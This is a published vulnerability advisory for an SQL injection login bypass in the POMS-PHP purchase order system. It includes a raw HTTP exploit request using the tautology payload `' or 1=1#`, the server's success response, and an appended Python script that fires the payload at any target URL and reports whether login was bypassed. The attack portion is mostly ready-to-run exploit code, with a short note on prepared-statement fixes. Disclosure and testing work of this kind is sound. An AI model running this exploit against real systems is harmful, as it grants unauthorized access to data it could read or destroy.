POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication

2024.11.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication
## Author: nu11secur1ty
## Date: 11/08/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `username` parameter of the login handler (`/purchase_order/classes/Login.php?f=login`) is vulnerable to SQL injection that bypasses authentication. Appending a tautology such as `' or 1=1#` to the username makes the login query match a row regardless of the supplied password (the `#` comments out the rest of the statement, including the password check), so an unauthenticated remote attacker can log in, read sensitive information, or destroy the data.

STATUS: HIGH - Vulnerability

[+]Exploit:

- SQLi:

```http
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 44
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=nu11secur1ty' or 1=1#&password=sada
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:08:35 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"status":"success"}
```

## Reproduce:
[href](https://www.youtube.com/watch?v=wG60bjiFN7o)

## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright.html)

## Time spent: 00:05:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
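The following script is an added triage helper for the bypass described above; it is not the advisory author's PoC and not code from POMS-PHP. It does two things: renders what the advisory's payload does to a login query of the kind an unsafe handler would build (the query shape in `ASSUMED_QUERY` is an assumption, since the advisory does not show the PHP source), and sends the same POST as the request above together with a plain wrong-password baseline, only reporting a bypass when the tautology logs in and the baseline does not. The endpoint path and the `{"status":"success"}` body are taken from the advisory; the target host is a placeholder.

```python
"""
Added triage helper for the POMS-PHP login SQLi (not the advisory author's
script, not project code). Assumptions: the handler concatenates `username`
into a MySQL query shaped like ASSUMED_QUERY; the path and the JSON success
body are copied from the advisory; the host passed on the command line is a
placeholder.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

LOGIN_PATH = "/purchase_order/classes/Login.php?f=login"
PAYLOAD_USERNAME = "nu11secur1ty' or 1=1#"  # payload used in the advisory

# Hypothetical shape of the vulnerable query (assumption, the PHP is not shown).
ASSUMED_QUERY = (
    "SELECT * FROM users WHERE username = '{username}' "
    "AND password = md5('{password}')"
)


def render_assumed_query(username: str, password: str) -> str:
    """Build the query the way an unsafe handler would: plain string concatenation."""
    return ASSUMED_QUERY.format(username=username, password=password)


def effective_mysql_query(sql: str) -> str:
    """Return the part of the statement MySQL actually evaluates.

    A '#' outside a quoted string starts a comment to end of line, so everything
    after it (here the password predicate) is discarded. The quote tracking is
    deliberately naive (no escaped-quote handling); it is enough for the demo.
    """
    in_quote = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return sql[:i].rstrip()
    return sql


def build_body(username: str, password: str) -> str:
    """application/x-www-form-urlencoded body; decodes to the same values as the raw body in the advisory."""
    return urllib.parse.urlencode({"username": username, "password": password})


def login_succeeded(body: str) -> bool:
    """True only when the handler answered {"status":"success"}; non-JSON counts as failure."""
    try:
        return json.loads(body).get("status") == "success"
    except (ValueError, AttributeError):
        return False


def is_vulnerable(baseline_body: str, payload_body: str) -> bool:
    """Call it a bypass only if the tautology logs in AND a plain wrong password does not,
    so a target that returns success to every request is not misreported."""
    return login_succeeded(payload_body) and not login_succeeded(baseline_body)


def post_login(base_url: str, username: str, password: str, timeout: float = 10.0) -> str:
    """Send the POST from the advisory and return the response body as text."""
    req = urllib.request.Request(
        base_url.rstrip("/") + LOGIN_PATH,
        data=build_body(username, password).encode(),
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
        },
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe(base_url: str) -> bool:
    """Baseline (wrong password) first, then the injected username; compare the two."""
    baseline = post_login(base_url, "nu11secur1ty", "definitely-wrong-password")
    injected = post_login(base_url, PAYLOAD_USERNAME, "sada")
    return is_vulnerable(baseline, injected)


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "https://pwnedhost.com"  # placeholder host
    print("effective query:", effective_mysql_query(render_assumed_query(PAYLOAD_USERNAME, "sada")))
    print("vulnerable:", probe(target))
```

Run it as `python3 poc.py https://<target>`. The rendered query shows why the password value is irrelevant: after the `#` the comparison is gone and `or 1=1` matches every row. The fix on the application side is to stop concatenating and bind `username` and `password` as parameters of a prepared statement (mysqli or PDO), which keeps the quote and the `#` inside the value instead of the SQL.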

